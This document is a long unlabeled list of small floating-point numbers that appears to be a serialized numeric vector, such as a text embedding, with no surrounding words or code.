-0.02743375115096569, 0.002380614634603262, -0.010323082096874714, -0.027603793889284134, -0.0017695194110274315, -0.001306326943449676, -0.0212696585804224, -0.014765479601919651, -0.04310613125562668, -0.0010131782619282603, -0.012661186046898365, -0.0401587039232254, 0.016947709023952484, -0.003468187293037772, 0.011640922166407108, 0.03525577113032341, -0.049794524908065796, -0.021949835121631622, -0.03185489401221275, 0.019994329661130905, -0.020419439300894737, -0.009678332135081291, 0.043871328234672546, 0.014177410863339901, -0.0012886140029877424, -0.002940342528745532, 0.0010964289540424943, -0.022544987499713898, -0.011322090402245522, 0.01707524247467518, 0.014482072554528713, -0.011534645222127438, 0.03400878235697746, -0.0024443811271339655, 0.025889184325933456, 0.012023521587252617, 0.049851205199956894, -0.023721124976873398, -0.022870905697345734, -0.0022389115765690804, -0.027873029932379723, -0.004130649846047163, 0.0055476827546954155, 0.017599545419216156, 0.015360632911324501, -0.01090406533330679, 0.04633696377277374, -0.01171885896474123, -0.001925393007695675, 0.006419157609343529, -0.05795663222670555, -0.01562986895442009, -0.027816349640488625, 0.00876434613019228, -0.0002670220856089145, 0.009253222495317459, -0.022899245843291283, -0.026597701013088226, -0.009047753177583218, -0.022332433611154556, -0.019526708871126175, 0.022162389010190964, 0.004463652614504099, -0.01503471564501524, -0.033073540776968, 0.0100680161267519, 0.01146379392594099, -0.029474277049303055, 0.00018421423737891018, 0.03667280450463295, 0.00007671902858419344, 0.002387699903920293, -0.029644321650266647, 0.02482641115784645, -0.022105708718299866, 0.010606489144265652, -0.030919650569558144, -0.04585517570376396, 0.0332152433693409, -0.03695620968937874, -0.021383021026849747, -0.02791554108262062, -0.037976473569869995, 0.008126681670546532, -0.03664446249604225, -0.005012752953916788, -0.030012749135494232, 0.011265409179031849, -0.0066246273927390575, 0.0295876394957304, 0.002332789823412895, -0.005285531282424927, -0.014963864348828793, -0.018038824200630188, 0.045118317008018494, 0.0005995819228701293, 0.0118109667673707, 0.01016012392938137, -0.02505313605070114, 0.009479948319494724, -0.01407821848988533, 0.005342212971299887, -0.002424896927550435, -0.009076093323528767, 0.04236927255988121, -0.0034292188938707113, 0.018109675496816635, -0.01819469779729843, 0.041263990104198456, 0.016281703487038612, -0.021595576778054237, -0.025152327492833138, 0.06966131925582886, -0.02576165273785591, 0.011378771625459194, -0.038968395441770554, 0.03877001255750656, -0.010330167599022388, 0.011315004900097847, -0.0013204972492530942, -0.008835198357701302, 0.011059938929975033, -0.015927447006106377, 0.013816067948937416, 0.0008178934804163873, 0.01779792830348015, -0.0004071754519827664, -0.0010105213150382042, 0.026866937056183815, -0.006348305847495794, 0.014085303992033005, 0.01656511053442955, -0.01704690232872963, -0.00596570735797286, -0.041292328387498856, -0.015573187731206417, 0.000059781061281682923, -0.01918662153184414, 0.01964007131755352, -0.04718718305230141, 0.006932831835001707, 0.01171177439391613, -0.015998298302292824, 0.04330451413989067, -0.015984127297997475, -0.016267534345388412, -0.001169937546364963, -0.003988946788012981, -0.022431625053286552, -0.011038683354854584, -0.02386282943189144, 0.017656225711107254, -0.019555049017071724, -0.004353832453489304, 0.037749748677015305, 0.007460676599293947, -0.01171885896474123, 0.015955787152051926, 0.0019661327823996544, 0.015757402405142784, 0.0009414410451427102, -0.007166642230004072, 0.009182371199131012, -0.005590193439275026, -0.0018899672431871295, 0.0016295874956995249, -0.0018439136911183596, 0.01635255664587021, 0.014652117155492306, 0.017642054706811905, -0.005420149769634008, -0.011322090402245522, 0.041320670396089554, -0.024287939071655273, -0.021099615842103958, -0.00041669612983241677, -0.002741958014667034, 0.02226158231496811, 0.00969958771020174, -0.04276604205369949, 0.03879835084080696, 0.004771857056766748, 0.02792971208691597, 0.05639789626002312, -0.017840439453721046, 0.010613573715090752, 0.020008500665426254, 0.03993197903037071, 0.0006611342541873455, 0.011981010437011719, 0.03264842927455902, 0.008013319224119186, -0.03698455169796944, 0.0106348292902112, -0.023055119439959526, 0.0212554894387722, 0.03451891243457794, 0.002688819309696555, -0.02200651541352272, -0.01134334597736597, -0.016635961830615997, -0.040612153708934784, 0.029162529855966568, -0.001990930875763297, -0.027547113597393036, -0.018166357651352882, 0.006532520055770874, 0.024472152814269066, 0.0032910581212490797, -0.024061212316155434, -0.016536770388484, -0.004431769251823425, 0.009855461306869984, -0.006447498220950365, 0.00010467220999998972, -0.031146375462412834, 0.007102875970304012, 0.007202067878097296, -0.00549808656796813, 0.02652684971690178, 0.02836899273097515, -0.008835198357701302, -0.016635961830615997, 0.005650417413562536, 0.020447779446840286, 0.01704690232872963, -0.007836190052330494, 0.052203480154275894, 0.05849510431289673, -0.0014613148523494601, -0.014878842048346996, -0.0026781915221363306, -0.04987954720854759, -0.011768455617129803, 0.0002413383626844734, 0.006465211044996977, -0.00633767805993557, -0.028113925829529762, -0.010478955693542957, -0.009012327529489994, -0.0008564190356992185, -0.000008904887181415688, -0.039138440042734146, 0.01941334642469883, -0.001121227047406137, -0.005586651153862476, -0.01582825370132923, 0.007694486994296312, 0.008112511597573757, -0.031373102217912674, 0.00841008871793747, -0.0016880400944501162, 0.007290632463991642, -0.007793679367750883, 0.021964004263281822, -0.01351140532642603, 0.014467902481555939, -0.006050729192793369, 0.019710922613739967, -0.01680600643157959, -0.014581264927983284, 0.025492416694760323, 0.010925320908427238, 0.012476971372961998, 0.04052713140845299, 0.017840439453721046, -0.05033299699425697, 0.025662459433078766, -0.017826270312070847, -0.008643899112939835, -0.007744083181023598, -0.015048885717988014, -0.001787232351489365, 0.0005548568442463875, -0.03996031731367111, 0.021949835121631622, 0.03647441789507866, -0.013553916476666927, -0.010153038427233696, 0.02624344266951084, 0.005080061964690685, -0.023111801594495773, 0.012717867270112038, -0.012434461154043674, 0.020476121455430984, 0.016522599384188652, -0.020391099154949188, 0.002763213589787483, -0.01564403995871544, 0.002378843491896987, 0.012944592162966728, -0.008828112855553627, -0.007736997678875923, -0.015332292765378952, -0.01964007131755352, 0.0049844118766486645, -0.0037303382996469736, 0.005873600021004677, 0.011265409179031849, -0.015799913555383682, 0.00686552282422781, -0.02134050987660885, -0.03576590120792389, 0.017684565857052803, 0.018548956140875816, -0.00574606703594327, -0.03638939559459686, 0.011378771625459194, -0.005352840758860111, -0.007793679367750883, 0.01846393384039402, 0.00006780722469557077, -0.001424117712303996, 0.021142125129699707, -0.02180813066661358, -0.01846393384039402, -0.006203060038387775, 0.01942751742899418, -0.008821027353405952, -0.016961880028247833, 0.015204759314656258, 0.010110527276992798, 0.0049596140161156654, 0.0355675183236599, -0.018067166209220886, -0.025449905544519424, -0.0005898398230783641, 0.036105990409851074, -0.014028622768819332, -0.014163240790367126, -0.021822301670908928, 0.017330307513475418, 0.011725944466888905, -0.017188604921102524, 0.00015819839609321207, -0.002917315810918808, -0.00379056204110384, 0.011605496518313885, -0.008870624005794525, 0.014503328129649162, 0.0016508429544046521, 0.009657076559960842, -0.012817059643566608, -0.00419441657140851, -0.006022388581186533, 0.029701001942157745, 0.005391809158027172, 0.0016862687189131975, 0.030182793736457825, -0.001114141894504428, 0.02057531289756298, -0.0450049564242363, 0.016437577083706856, -0.03188323229551315, 0.009862546809017658, -0.0049808695912361145, -0.025209009647369385, 0.052430205047130585, -0.034405551850795746, -0.00021753663895651698, -0.004180246032774448, -0.0032768878154456615, -0.02151055447757244, 0.02177979052066803, -0.022785883396863937, -0.001132740406319499, -0.02743375115096569, 0.007708657067269087, 0.027405409142374992, -0.023976191878318787, -0.028539035469293594, 0.0025116901379078627, 0.0053599257953464985, -0.006426242645829916, -0.028269799426198006, -0.005204052198678255, -0.016976051032543182, -0.014361625537276268, 0.02345188893377781, -0.037551362067461014, -0.002931486116722226, -0.005848802160471678, -0.0001966132695088163, 0.014552924782037735, -0.011102450080215931, 0.03454725444316864, -0.013964856043457985, 0.016494259238243103, -0.017316138371825218, -0.03245004639029503, 0.033952102065086365, -0.023324355483055115, 0.0006660053040832281, 0.0007386282086372375, -0.037523023784160614, 0.02907750755548477, -0.014106559567153454, 0.0260308887809515, 0.011733029969036579, 0.026824425905942917, 0.00010384192137280479, -0.011754285544157028, 0.01264701597392559, -0.018152186647057533, 0.0011770226992666721, -0.005568937864154577, 0.03006943129003048, 0.006755702663213015, -0.0008236501598730683, -0.03193991258740425, 0.026810256764292717, -0.01159132644534111, -0.005512256640940905, 0.002857091836631298, -0.025917526334524155, -0.010585233569145203, -0.025931695476174355, -0.003379622707143426, -0.022119877859950066, 0.008275470696389675, 0.009798780083656311, 0.03026781603693962, 0.04185914248228073, 0.0012540738098323345, 0.010826128534972668, -0.019526708871126175, 0.015927447006106377, -0.02221907116472721, -0.0038366157095879316, 0.030692925676703453, -0.014177410863339901, 0.04112228378653526, 0.01030891202390194, -0.02814226783812046, 0.006387274246662855, 0.011442538350820541, 0.019994329661130905, -0.009897972457110882, -0.04639364778995514, -0.008445514366030693, 0.011059938929975033, -0.02226158231496811, -0.02741958014667034, 0.0014949693577364087, 0.0025418021250516176, -0.03049454092979431, 0.00875726155936718, -0.010245145298540592, 0.003833073191344738, -0.01252656802535057, 0.017330307513475418, 0.008849368430674076, 0.019101599231362343, 0.01264701597392559, 0.009975909255445004, 0.018577296286821365, -0.0354824960231781, 0.02202068641781807, -0.018534786999225616, -0.013206743635237217, 0.0037019976880401373, -0.0003715282364282757, -0.020419439300894737, -0.039648570120334625, -0.023820318281650543, 0.032761793583631516, 0.03576590120792389, -0.0018509988440200686, -0.0077015720307827, -0.04137735068798065, -0.02955929934978485, -0.009564969688653946, 0.0024957486893981695, 0.01864814944565296, -0.020235225558280945, -0.02771715633571148, -0.0021096072159707546, 0.04795238375663757, 0.008374662138521671, -0.02132634073495865, 0.01703273132443428, 0.030607903376221657, 0.010974917560815811, 0.011633837595582008, -0.021694768220186234, -0.02200651541352272, -0.02056114189326763, -0.037523023784160614, 0.01289499644190073, 0.006302252411842346, 0.061215806752443314, 0.013766471296548843, 0.01229984313249588, -0.009926313534379005, 0.014149070717394352, -0.009954653680324554, -0.019597560167312622, -0.03959188982844353, 0.025010624900460243, -0.014361625537276268, 0.020717015489935875, 0.005402436479926109, -0.015190589241683483, -0.015473995357751846, -0.007102875970304012, 0.020532801747322083, -0.02671106345951557, -0.016706814989447594, 0.0024815783835947514, -0.0028074958827346563, -0.04313447326421738, -0.019540879875421524, 0.005398894194513559, 0.006674223579466343, 0.0007496987818740308, -0.007078077644109726, 0.011499219574034214, -0.003257403615862131, -0.01683434657752514, -0.02630012482404709, -0.013943600468337536, -0.013150062412023544, -0.027377068996429443, -0.005614991765469313, -0.019781773909926414, -0.03602096810936928, 0.002369987079873681, -0.02107127383351326, -0.026881108060479164, 0.0056220768019557, 0.014836330898106098, 0.012377779930830002, 0.01183222234249115, -0.027504602447152138, -0.01526144053786993, 0.03621935099363327, 0.007347313687205315, -0.019299983978271484, 0.005583108402788639, -0.018889043480157852, -0.041037265211343765, -0.006366018671542406, -0.00189528102055192, 0.00994048360735178, 0.01750035211443901, -0.001742950058542192, 0.04823578894138336, 0.0019749891944229603, -0.021638087928295135, -0.03709791228175163, -0.002772070001810789, -0.009954653680324554, -0.00301473680883646, 0.01232109870761633, -0.02134050987660885, -0.006649425253272057, -0.01469462737441063, 0.009657076559960842, 0.011704688891768456, -0.0030572477262467146, 0.006716734264045954, 0.0020724101923406124, 0.012491142377257347, 0.015318121761083603, -0.038004811853170395, 0.03650275990366936, 0.01042935997247696, 0.0014639717992395163, -0.024103723466396332, -0.0019944733940064907, -0.03338528797030449, -0.038713328540325165, -0.0331018827855587, 0.009508288465440273, -0.005710641387850046, -0.03621935099363327, 0.0003219320788048208, 0.017443671822547913, 0.011619667522609234, -0.019597560167312622, 0.0023841573856770992, -0.04588351398706436, 0.009069008752703667, 0.01609748974442482, 0.00898398645222187, -0.014276603236794472, -0.01324216928333044, -0.019059088081121445, 0.038231540471315384, 0.01088280975818634, 0.03689952939748764, -0.02795805223286152, 0.002446152502670884, -0.02036275900900364, 0.009961739182472229, 0.002274337224662304, 0.02622927352786064, 0.0023912424221634865, -0.0014551152708008885, 0.01893155463039875, 0.019229132682085037, 0.0004215671797282994, 0.016239194199442863, -0.005661045201122761, 0.01052855234593153, 0.0002630366652738303, -0.0025099189952015877, 0.029530959203839302, -0.01748618111014366, -0.008750176057219505, 0.013440554030239582, 0.027547113597393036, 0.00782910455018282, -0.053365446627140045, -0.006181804463267326, -0.006971800234168768, 0.014722968451678753, 0.029927728697657585, 0.006380189210176468, 0.0012886140029877424, -0.024047043174505234, 0.014680457301437855, 0.003335340414196253, 0.04953945800662041, -0.01914411038160324, -0.010918236337602139, -0.002485120901837945, 0.005802748259156942, -0.0027915542013943195, 0.009387840516865253, -0.019923478364944458, -0.012094372883439064, -0.014935523271560669, 0.014106559567153454, -0.014524583704769611, -0.024698877707123756, -0.01823720894753933, -0.010762362740933895, -0.01679183542728424, -0.010726936161518097, 0.011187472380697727, 0.007935382425785065, 0.020433610305190086, -0.021581405773758888, -0.012484056875109673, 0.031599827110767365, -0.03389541804790497, 0.0004950757720507681, -0.012724952772259712, -0.016040809452533722, -0.014978034421801567, -0.0035957202780991793, -0.022119877859950066, -0.020759526640176773, 0.021468043327331543, -0.05639789626002312, 0.0020068723242729902, 0.0011150274658575654, -0.02749043144285679, 0.01897406578063965, -0.01847810484468937, -0.013716875575482845, -0.024287939071655273, 0.025903355330228806, -0.027986394241452217, -0.015077226795256138, 0.002749043283984065, 0.02505313605070114, 0.07702989131212234, 0.02817060798406601, -0.014368710108101368, -0.013369702734053135, -0.0007665260345675051, 0.0051686265505850315, 0.015544847585260868, 0.00337076629512012, 0.013185488060116768, -0.004591185599565506, 0.030607903376221657, -0.0025134615134447813, 0.010967832058668137, 0.0011575384996831417, -0.009522458538413048, 0.0004964042454957962, -0.013199658133089542, -0.021184636279940605, 0.014219922013580799, 0.005940909031778574, 0.009019412100315094, -0.004917102865874767, 0.02933257445693016, -0.009309903718531132, 0.01003967598080635, -0.02578999288380146, -0.016961880028247833, -0.016281703487038612, -0.017571203410625458, -0.0028978316113352776, 0.012158139608800411, 0.0112441536039114, -0.016281703487038612, -0.015799913555383682, 0.013405128382146358, -0.002152118133381009, 0.011201642453670502, 0.0034788150805979967, 0.008650983683764935, -0.01609748974442482, 0.012724952772259712, -0.012193565256893635, -0.019129939377307892, 0.0037338808178901672, -0.0049808695912361145, -0.025421563535928726, 0.03174152970314026, -0.007318973075598478, -0.03389541804790497, -0.013036699965596199, -0.00609323987737298, -0.021836472675204277, 0.002221198519691825, 0.03471729904413223, -0.015006374567747116, 0.017443671822547913, -0.01612582989037037, -0.0010291199432685971, 0.004913560580462217, -0.02085871994495392, -0.003340654307976365, 0.011662177741527557, -0.012136884033679962, -0.0011823365930467844, 0.008282555267214775, -0.015091396868228912, -0.01490718312561512, 0.01965424232184887, -0.006961172446608543, 0.025860844179987907, 0.024769729003310204, 0.004251097794622183, 0.01232109870761633, 0.0035266398917883635, -0.012831229716539383, 0.027547113597393036, -0.0048958477564156055, 0.004633696749806404, -0.049596142023801804, -0.0036240608897060156, 0.042029187083244324, 0.00922488234937191, 0.011137875728309155, 0.03287515416741371, -0.03100467287003994, 0.029445936903357506, 0.0031582112424075603, 0.004552217200398445, -0.0007147158030420542, 0.012143969535827637, 0.0036913699004799128, 0.0035018417984247208, 0.005777950398623943, 0.02461385540664196, 0.011541730724275112, 0.021893152967095375, 0.0008276355802081525, -0.011010343208909035, -0.011846392415463924, -0.0018846533494070172, 0.02647016942501068, -0.013723960146307945, 0.008112511597573757, 0.02508147619664669, -0.025889184325933456, 0.01751452311873436, 0.015573187731206417, 0.014524583704769611, 0.0047683147713541985, 0.005267818458378315, -0.04242595657706261, -0.03029615618288517, -0.006695479154586792, -0.027603793889284134, -0.002846464281901717, -0.01444664690643549, 0.006167634390294552, 0.012413205578923225, -0.012902081944048405, -0.02600254863500595, -0.008629728108644485, -0.005884227808564901, 0.02204902656376362, -0.01965424232184887, -0.000581426196731627, 0.013447639532387257, 0.0022229698952287436, -0.02105710469186306, 0.05302535742521286, 0.029502619057893753, 0.02464219741523266, 0.00876434613019228, -0.010422274470329285, -0.012809974141418934, 0.027788009494543076, -0.03760804608464241, 0.0037303382996469736, 0.020717015489935875, -0.009196541272103786, 0.0020121862180531025, 0.0026764203794300556, 0.023140141740441322, 0.017457840964198112, -0.005986962467432022, 0.0034593308810144663, 0.012073117308318615, 0.022403284907341003, 0.010889895260334015, -0.004081053659319878, -0.0022017143201082945, -0.004445939790457487, -0.01562986895442009, 0.016508430242538452, 0.0354824960231781, 0.01964007131755352, 0.023040950298309326, 0.02251664735376835, -0.008431344293057919, -0.0037480511236935854, 0.010280570946633816, -0.001470171264372766, 0.019810115918517113, 0.021184636279940605, -0.022204900160431862, -0.0013125264085829258, 0.036559440195560455, -0.0011309691471979022, -0.05821169912815094, -0.009919228032231331, -0.020419439300894737, 0.020901231095194817, 0.013752301223576069, -0.0075740390457212925, -0.005877142772078514, 0.0012673585442826152, 0.020504461601376534, -0.03097633272409439, -0.0012682441156357527, 0.011442538350820541, -0.02340937778353691, 0.0015330520691350102, 0.033243585377931595, -0.01232109870761633, -0.007127673830837011, 0.026654383167624474, -0.015516506507992744, 0.017812099307775497, -0.007311888039112091, -0.03128807991743088, 0.021680599078536034, 0.010252230800688267, 0.04710216447710991, -0.02272920310497284, -0.004417599178850651, -0.025449905544519424, -0.004474280402064323, -0.007793679367750883, -0.01961173117160797, -0.0003168396360706538, 0.008119597099721432, -0.008452598936855793, -0.02083037979900837, -0.007850360125303268, -0.015530676580965519, -0.011265409179031849, -0.0032680314034223557, 0.014255347661674023, -0.00009869410132523626, -0.011534645222127438, -0.018619807437062263, -0.01914411038160324, -0.002568371593952179, 0.012228990904986858, -0.004144820384681225, 0.010982002131640911, 0.012604504823684692, 0.0068974061869084835, -0.025152327492833138, 0.011867647990584373, 0.016182512044906616, -0.024089554324746132, 0.027504602447152138, 0.015431485138833523, 0.01750035211443901, -0.011853477917611599, -0.00794955249875784, 0.03650275990366936, -0.030919650569558144, -0.0094516072422266, -0.0013187259901314974, -0.0012655871687456965, 0.018393082544207573, -0.006861980073153973, 0.014779649674892426, -0.00032326055224984884, -0.014822160825133324, -0.003317627590149641, 0.0035408101975917816, -0.006312880199402571, -0.014241177588701248, -0.009742098860442638, 0.01429785881191492, -0.02675357460975647, 0.002022814005613327, -0.009557885117828846, -0.0001963918621186167, -0.007152472157031298, 0.005462660454213619, -0.011109535582363605, 0.011924329213798046, -0.024939773604273796, -0.005700013600289822, -0.014333284460008144, -0.010075101628899574, -0.004102309234440327, 0.020986251533031464, 0.022389113903045654, 0.009111519902944565, 0.01562986895442009, 0.012838315218687057, 0.0042227571830153465, -0.009827121160924435, -0.012710781767964363, 0.016862688586115837, -0.012342353351414204, 0.032761793583631516, -0.0033778513316065073, -0.011995180509984493, -0.008367577567696571, 0.020702846348285675, 0.021822301670908928, -0.008105426095426083, 0.012066032737493515, 0.00537763861939311, 0.0032999145332723856, 0.030126113444566727, 0.0013080982025712729, -0.015048885717988014, -0.012887910939753056, 0.0017748333048075438, -0.021000422537326813, 0.027759667485952377, 0.013128806836903095, 0.014850500971078873, -0.0011566528119146824, -0.021680599078536034, -0.04137735068798065, -0.021496383473277092, 0.0011690518585965037, 0.007347313687205315, 0.010358507744967937, 0.006642340216785669, -0.015587358735501766, -0.03695620968937874, 0.008495110087096691, 0.002635680604726076, -0.02389116957783699, 0.037721406668424606, -0.020986251533031464, -0.007588209584355354, 0.028071414679288864, 0.021652257069945335, 0.014191580936312675, 0.011626752093434334, -0.0038932969328016043, 0.010974917560815811, -0.03341362997889519, -0.0014754851581528783, 0.014191580936312675, -0.008601387962698936, 0.022190731018781662, -0.012087288312613964, -0.004371545277535915, -0.010974917560815811, 0.009550799615681171, 0.0023079917300492525, -0.013752301223576069, 0.010719851590692997, -0.0009077864815481007, -0.009309903718531132, 0.002501062583178282, 0.004555759951472282, -0.022289922460913658, -0.02860988862812519, 0.0026923618279397488, -0.003765764180570841, -0.003455788129940629, -0.010075101628899574, 0.0029899387154728174, -0.022360773757100105, 0.03103301301598549, 0.011683433316648006, 0.035142406821250916, -0.007233951240777969, 0.019739264622330666, -0.006047186441719532, 0.0011734800646081567, 0.004672665148973465, -0.008140851743519306, -0.003578007221221924, -0.016905197873711586, 0.02152472548186779, -0.008530535735189915, -0.011825136840343475, 0.007843275554478168, 0.005834631621837616, 0.0004503506643231958, 0.014878842048346996, 0.014751309528946877, -0.012696611694991589, -0.011605496518313885, 0.00038924114778637886, 0.0039535206742584705, 0.018166357651352882, 0.0009281563106924295, 0.013745215721428394, 0.0029952526092529297, -0.003967691212892532, 0.009635821916162968, -0.009522458538413048, -0.00794246792793274, 0.020773697644472122, -0.0015144535573199391, -0.0025258606765419245, 0.0031086152885109186, 0.0036913699004799128, -0.013908174820244312, 0.0032060362864285707, 0.006755702663213015, -0.019455857574939728, -0.017812099307775497, 0.010592318139970303, 0.007326058577746153, 0.014389965683221817, -0.010195549577474594, 0.028581546619534492, 0.012618674896657467, -0.02484058029949665, -0.03335694596171379, 0.02464219741523266, 0.00633767805993557, -0.0074890172109007835, 0.0058452594093978405, -0.009380755946040154, -0.0591752789914608, 0.0009556113509461284, -0.019484197720885277, 0.01986679621040821, -0.004300693981349468, -0.005884227808564901, 0.009487032890319824, 0.008112511597573757, 0.007524442858994007, 0.032109957188367844, 0.00782910455018282, 0.01338387280702591, 0.004375088028609753, 0.026186762377619743, -0.02859571762382984, 0.0040102023631334305, 0.0378064289689064, 0.0053634680807590485, -0.00839591771364212, 0.011981010437011719, -0.012009351514279842, -0.010252230800688267, -0.004545132163912058, -0.033952102065086365, 0.033725377172231674, 0.0006181804346852005, 0.01611166074872017, -0.004339662380516529, 0.010372678749263287, -0.01728779822587967, -0.01866231858730316, -0.00804166030138731, -0.011910159140825272, -0.006596286781132221, -0.0018935097614303231, -0.007907041348516941, 0.004435312002897263, -0.0028925177175551653, -0.02061782404780388, -0.033016860485076904, 0.011881818063557148, -0.006008218042552471, -0.002281422493979335, -0.0027153887785971165, 0.02080203779041767, 0.005583108402788639, 0.006550232879817486, 0.026144251227378845, 0.0147938197478652, 0.003942893352359533, 0.002917315810918808, -0.005537054967135191, -0.02578999288380146, -0.004821453243494034, 0.012838315218687057, -0.0005229735979810357, -0.00668130861595273, -0.011045768857002258, 0.0004116036870982498, 0.010337253101170063, 0.013270510360598564, -0.014141985215246677, -0.006256198976188898, -0.0048958477564156055, -0.013723960146307945, 0.0038224454037845135, 0.029445936903357506, -0.00036643576459027827, 0.009508288465440273, 0.0007306574261747301, 0.008835198357701302, -0.025038965046405792, 0.013638938777148724, -0.004042085260152817, 0.005157998763024807, -0.005494543816894293, 0.018364742398262024, -0.007340228650718927, 0.0213121697306633, 0.00910443440079689, 0.012044777162373066, 0.0021627459209412336, 0.010252230800688267, -0.017089413478970528, 0.002470950596034527, -0.025379054248332977, 0.03494402393698692, -0.02295592799782753, 0.02034858800470829, 0.002545344876125455, -0.015105566941201687, -0.01893155463039875, -0.024202916771173477, -0.023324355483055115, 0.004669122397899628, 0.0021574320271611214, -0.0017305510118603706, 0.014234092086553574, -0.002295592799782753, 0.01611166074872017, -0.003886211896315217, 0.013681449927389622, 0.0038543285336345434, 0.016650132834911346, 0.0077653382904827595, 0.00037595644243992865, 0.0002535159874241799, 0.0017163807060569525, -0.012115628458559513, 0.00521822227165103, 0.008792687207460403, 0.006840724963694811, 0.006475838832557201, 0.026881108060479164, 0.02416040562093258, -0.013674364425241947, 0.009061923250555992, -0.0016508429544046521, 0.005937366280704737, -0.014467902481555939, 0.009685417637228966, -0.008070000447332859, -0.00932407472282648, 0.018761511892080307, 0.02034858800470829, -0.02482641115784645, -0.00994048360735178, -0.005661045201122761, -0.008020404726266861, 0.012873740866780281, 0.002986396197229624, 0.004272353369742632, -0.0136105976998806, -0.002662249840795994, -0.017642054706811905, 0.016749324277043343, 0.002743729390203953, 0.0029137732926756144, 0.01229984313249588, -0.009947569109499454, -0.0005468860035762191, 0.004651409573853016, 0.0008006233838386834, 0.011237068101763725, 0.0010618887608870864, -0.0014409449649974704, -0.01018846407532692, -0.00444239703938365, -0.006968257483094931, -0.017344478517770767, -0.005165083799511194, -0.004208586644381285, 0.04092390090227127, -0.022360773757100105, 0.008459684439003468, -0.008034574799239635, 0.016239194199442863, 0.00982003565877676, -0.0015596214216202497, 0.01751452311873436, -0.0051119448617100716, -0.02058948390185833, 0.01550233643501997, -0.011442538350820541, -0.01323508471250534, 0.016054978594183922, -0.00431840680539608, -0.00008518801041645929, -0.005529969464987516, -0.013582257553935051, -0.0073827398009598255, 0.014361625537276268, -0.011768455617129803, -0.001734093646518886, -0.012965847738087177, 0.03128807991743088, -0.018804023042321205, -0.011414197273552418, 0.024032872170209885, 0.023706955835223198, 0.018761511892080307, 0.030664585530757904, 0.0007209153263829648, 0.010946576483547688, 0.010252230800688267, -0.0426810197532177, 0.0030944449827075005, -0.00550162885338068, -0.003400878282263875, 0.0177695881575346, -0.011315004900097847, 0.01407821848988533, -0.0014524584403261542, 0.009394926019012928, 0.007708657067269087, 0.005912568420171738, 0.0015135678695514798, 0.0042015016078948975, -0.012441545724868774, -0.006263284012675285, 0.008133767172694206, -0.018081335350871086, 0.0024815783835947514, -0.0355391763150692, -0.012243161909282207, -0.0033601385075598955, 0.00885645393282175, 0.02552075684070587, -0.014850500971078873, 0.0016074463492259383, -0.012930422089993954, -0.013128806836903095, -0.01985262706875801, 0.0027543571777641773, 0.004509706050157547, -0.00478956988081336, 0.0045167915523052216, 0.01752869226038456, -0.005671672988682985, 0.003303457284346223, -0.008155022747814655, 0.0007372997351922095, 0.013553916476666927, -0.0072977179661393166, -0.016380896791815758, -0.017812099307775497, 0.015346462838351727, -0.017698736861348152, 0.008870624005794525, 0.003319398732855916, -0.00714892940595746, 0.005894855596125126, 0.001742950058542192, -0.008027489297091961, -0.0026764203794300556, -0.03502904623746872, 0.010797788389027119, 0.024103723466396332, -0.00804166030138731, 0.010826128534972668, 0.0026108825113624334, 0.015927447006106377, 0.01266827154904604, 0.0010787160135805607, -0.005239477846771479, 0.002385928528383374, 0.011952669359743595, 0.02482641115784645, 0.015204759314656258, 0.011917243711650372, -0.004704548045992851, 0.02624344266951084, -0.014453732408583164, -0.0047258036211133, -0.0018129160162061453, -0.0022530818823724985, 0.002168059814721346, -0.0260450579226017, 0.009961739182472229, 0.0030165081843733788, -0.016919368878006935, 0.011761370114982128, -0.015516506507992744, -0.013390958309173584, -0.003687827382236719, 0.004577015060931444, 0.02581833302974701, 0.013808982446789742, -0.0052571906708180904, 0.0067946710623800755, -0.006440413184463978, -0.013886919245123863, -0.022530818358063698, -0.020164374262094498, -0.002419583033770323, 0.017174433916807175, 0.029984408989548683, -0.009203626774251461, -0.01565820910036564, 0.010804872959852219, 0.0136035131290555, 0.010797788389027119, 0.002984624821692705, -0.01183222234249115, 0.011768455617129803, 0.02200651541352272, -0.008771431632339954, 0.0055476827546954155, -0.004927730653434992, 0.0024213544093072414, 0.00020480548846535385, -0.016451748088002205, -0.01747201196849346, 0.0055724806152284145, -0.021014593541622162, 0.007067449856549501, 0.012172309681773186, -0.009947569109499454, -0.009083178825676441, -0.0011008571600541472, -0.006298709660768509, -0.01748618111014366, -0.01469462737441063, -0.0047080907970666885, -0.018874874338507652, -0.004059798549860716, 0.016947709023952484, 0.0004955185577273369, 0.006238485686480999, -0.004552217200398445, -0.00957913976162672, -0.03400878235697746, -0.010294741950929165, 0.018789852038025856, -0.008665153756737709, 0.0026161964051425457, -0.009862546809017658, -0.017656225711107254, -0.001678297994658351, 0.0147938197478652, -0.031118035316467285, 0.02746209129691124, -0.011357516050338745, 0.019484197720885277, 0.009309903718531132, 0.0022070282138884068, 0.017131924629211426, -0.02202068641781807, 0.0009697816567495465, -0.007885786704719067, 0.0024532375391572714, 0.01589910499751568, 0.004049170762300491, -0.019725093618035316, 0.025478245690464973, -0.013065040111541748, -0.00838883314281702, 0.012852485291659832, 0.006904491223394871, -0.024741388857364655, 0.004031457472592592, -0.005629161838442087, 0.0005761123029515147, -0.00994048360735178, -0.024472152814269066, 0.005026923026889563, 0.011081194505095482, -0.010478955693542957, 0.02766047604382038, -0.012724952772259712, -0.000022985264877206646, -0.009926313534379005, 0.01028765644878149, -0.005618534050881863, -0.007878701202571392, 0.005473288241773844, 0.023338526487350464, 0.013816067948937416, 0.011867647990584373, 0.001401090994477272, -0.011655093170702457, 0.003622289514169097, -0.009295733645558357, 0.015927447006106377, -0.028964145109057426, 0.02552075684070587, 0.0007461562054231763, 0.008303810842335224, -0.009359500370919704, 0.023097630590200424, -0.0043325768783688545, -0.009033583104610443, -0.0019342494197189808, -0.0008059372776187956, 0.007439421024173498, -0.01750035211443901, -0.0016171884490177035, 0.009954653680324554, 0.02624344266951084, 0.011903073638677597, 0.00828964076936245, 0.009437437169253826, 0.002433753339573741, -0.01584242470562458, -0.008806857280433178, -0.019470026716589928, 0.005721269175410271, 0.02488309144973755, 0.013440554030239582, -0.003305228427052498, 0.0006899177096784115, -0.014489158056676388, 0.005894855596125126, -0.010932406410574913, 0.003772849217057228, -0.012576163746416569, 0.012073117308318615, -0.016380896791815758, 0.0005672558327205479, -0.0011035141069442034, 0.018038824200630188, -0.0038614138029515743, 0.006298709660768509, 0.02535071223974228, 0.012151054106652737, -0.030437860637903214, -0.003347739577293396, 0.008091256022453308, 0.00034075204166583717, -0.004158990457653999, -0.0007895528106018901, -0.005402436479926109, 0.003349510719999671, -0.01146379392594099, 0.01431911438703537, -0.02132634073495865, -0.013716875575482845, -0.013249254785478115, -0.012292757630348206, 0.01003967598080635, 0.02865239791572094, -0.0058700572699308395, 0.003257403615862131, 0.01873316988348961, 0.01844976469874382, 